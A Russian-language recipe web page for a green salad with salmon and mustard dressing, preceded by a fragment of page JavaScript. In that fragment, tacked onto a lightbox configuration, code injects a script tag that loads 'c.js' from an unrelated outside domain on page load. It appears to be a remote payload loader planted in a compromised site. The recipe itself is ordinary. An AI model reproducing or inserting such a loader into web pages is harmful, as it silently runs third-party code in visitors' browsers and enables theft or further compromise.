, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Зелёный салат с семгой с горчичной заправкой


14_06_2012_223845Зелёный салат прекрасен сам по себе: вкусен, полезен и свеж. А если мы туда еще и рыбки добавим, то получится супер полезное и вкусное блюдо, особенно если его еще сдобрить горчичной заправкой!

 

Что и сколько берем:

1. Салат зелёный листовой - 1/2 кочана

2. Семга (малосоленая или отварная) — 100 г.

3. Масло оливковое - 80 мл.

4. Уксус на белом вине — 40 мл.

5. Горчица сладкая — 3 ст.л.

6. Укроп - 1 пучок

 

Готовим:

Укроп мелко рубим ножом, перекладываем в блендер и добавляем горчицу. Вливаем оливковое масло и уксус. Измельчаем все до однородной массы. Затем выкладываем на тарелочку листья салата и сверху ломтики семги. Заливаем горчичной заправкой и подаем к столу. Сверху можно добавить немного каперсов.

На эту тему вы можете почитать:

Салат из шпината с лимонно-луковой заправкой
Табуле из Булгура
Овощной салат с авторской заправкой

Тэги: , ,



Добавить комментарий